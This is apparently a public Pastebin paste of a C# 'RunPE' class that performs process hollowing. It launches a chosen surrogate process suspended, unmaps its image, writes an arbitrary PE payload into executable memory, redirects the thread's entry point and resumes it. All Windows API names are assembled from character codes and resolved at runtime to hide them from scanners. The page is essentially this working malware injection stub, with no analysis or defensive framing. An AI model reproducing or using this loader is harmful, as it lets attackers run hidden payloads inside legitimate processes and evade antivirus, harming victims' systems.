API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 23rd, 2018
139
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 6.24 KB | None | 0 0
raw download clone embed print report
  1. RunPE d’oppresor
  2. RunPE d’oppresssor
  3.  
  4. using System.Runtime.InteropServices;
  5. using System;
  6. using System.Text;
  7. public class IX
  8.   {
  9.     [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  10.     internal static extern IntPtr LoadLibraryA([In, MarshalAs(UnmanagedType.LPStr)] string lpFileName);
  11.     [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
  12.     static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  13.     delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo);
  14.     delegate bool EXT(IntPtr hThr, uint[] ctxt);
  15.     delegate bool TEX(IntPtr t, uint[] c); //all kernel32
  16.     delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll
  17.     delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
  18.     delegate uint EAD(IntPtr hThread); //kernel32.dll
  19.     delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
  20.     delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
  21.     delegate bool MOR(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll
  22.     delegate bool OP(byte[] bytes, string surrogateProcess);
  23.  
  24.     public T CreateAPI<T>(string name, string method)
  25.     {
  26.     return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T));
  27.     }
  28.     public static bool AA(byte[] bytes, string surrogateProcess)
  29.     {
  30.     IX p = new IX();
  31.     OP F1 = new OP(p.R);
  32.     bool Res = F1(bytes, surrogateProcess);
  33.     return Res;
  34.     }
  35.     public bool R(byte[] bytes, string surrogateProcess)
  36.     {
  37.                 String K32 = Convert.ToString((char)107) + (char)101 + (char)114 + (char)110 + (char)101 + (char)108 + (char)51 + (char)50;
  38.                 String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108;
  39.     ESS CP = CreateAPI<ESS>(K32, Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65);
  40.     ION NUVS = CreateAPI<ION>(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110);
  41.     EXT GTC = CreateAPI<EXT>(K32, Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  42.     TEX STC = CreateAPI<TEX>(K32, Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
  43.     ORY RPM = CreateAPI<ORY>(K32, Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  44.     EAD RT = CreateAPI<EAD>(K32, Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100);
  45.     CEX VAE = CreateAPI<CEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120);
  46.     CTEX VPE = CreateAPI<CTEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120);
  47.     MOR WPM = CreateAPI<MOR>(K32, Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
  48.     try
  49.     {
  50.     IntPtr procAttr = IntPtr.Zero;
  51.     IntPtr[] processInfo = new IntPtr[4];
  52.     byte[] startupInfo = new byte[0x44];
  53.     int num2 = BitConverter.ToInt32(bytes, 60);
  54.     int num = BitConverter.ToInt16(bytes, num2 + 6);
  55.     IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
  56.     if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo))
  57.     {
  58.     uint[] ctxt = new uint[0xb3];
  59.     ctxt[0] = 0x10002;
  60.     if (GTC(processInfo[1], ctxt))
  61.     {
  62.     IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
  63.     IntPtr buffer = IntPtr.Zero;
  64.     IntPtr bufferSize = new IntPtr(4);
  65.     IntPtr numRead = IntPtr.Zero;
  66.     if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0))
  67.     {
  68.     IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
  69.     IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
  70.     IntPtr lpBaseAddress = VAE(processInfo[0], addr, size, 0x3000, 0x40);
  71.     int lpNumberOfBytesWritten;
  72.     WPM(processInfo[0], lpBaseAddress, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten);
  73.     int num5 = num - 1;
  74.     for (int i = 0; i <= num5; i++)
  75.     {
  76.     int[] dst = new int[10];
  77.     Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
  78.     byte[] buffer2 = new byte[(dst[4] - 1) + 1];
  79.     Buffer.BlockCopy(bytes, dst[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length);
  80.     size = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
  81.     addr = new IntPtr(buffer2.Length);
  82.     WPM(processInfo[0], size, buffer2, (uint)addr, out lpNumberOfBytesWritten);
  83.     }
  84.     size = new IntPtr(ctxt[0x29] + 8L);
  85.     addr = new IntPtr(4);
  86.     WPM(processInfo[0], size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)addr, out lpNumberOfBytesWritten);
  87.     ctxt[0x2c] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
  88.     STC(processInfo[1], ctxt);
  89.     }
  90.     }
  91.     RT(processInfo[1]);
  92.     }
  93.     }
  94.     catch
  95.     {
  96.     return false;
  97.     }
  98.     return true;
  99.     }
  100.   }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!